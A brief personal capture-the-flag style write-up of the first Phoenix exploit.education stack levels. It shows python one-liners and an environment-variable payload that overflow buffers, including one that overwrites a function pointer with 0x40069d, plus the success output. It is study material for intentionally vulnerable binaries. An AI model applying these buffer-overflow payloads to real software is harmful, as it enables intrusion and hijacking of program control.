Writeup for the Phoenix VM from http://exploit.education/phoenix/.
stack-onepython -c 'print 64*"A"'
stack-two
export ExploitEducation=$"cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc\n\t\n\r"
learned about endianess here. really missing some of the basic computer science stuff, but well coming to it…
stack-threeuser@phoenix-amd64:/opt/phoenix/amd64$ objdump stack-three -x | grep level
user@phoenix-amd64:/opt/phoenix/amd64$ python -c 'print "c"*64+"\x9d\x06@"' | ./stack-three
Welcome to phoenix/stack-three, brought to you by https://exploit.education
calling function pointer @ 0x40069d
Congratulations, you’ve finished phoenix/stack-three 🙂 Well done!
After researching for escaping ascii chars forever it seemed to me… but the \xHEXCODE notation ist pretty good to remember http://defindit.com/ascii.html
tbc
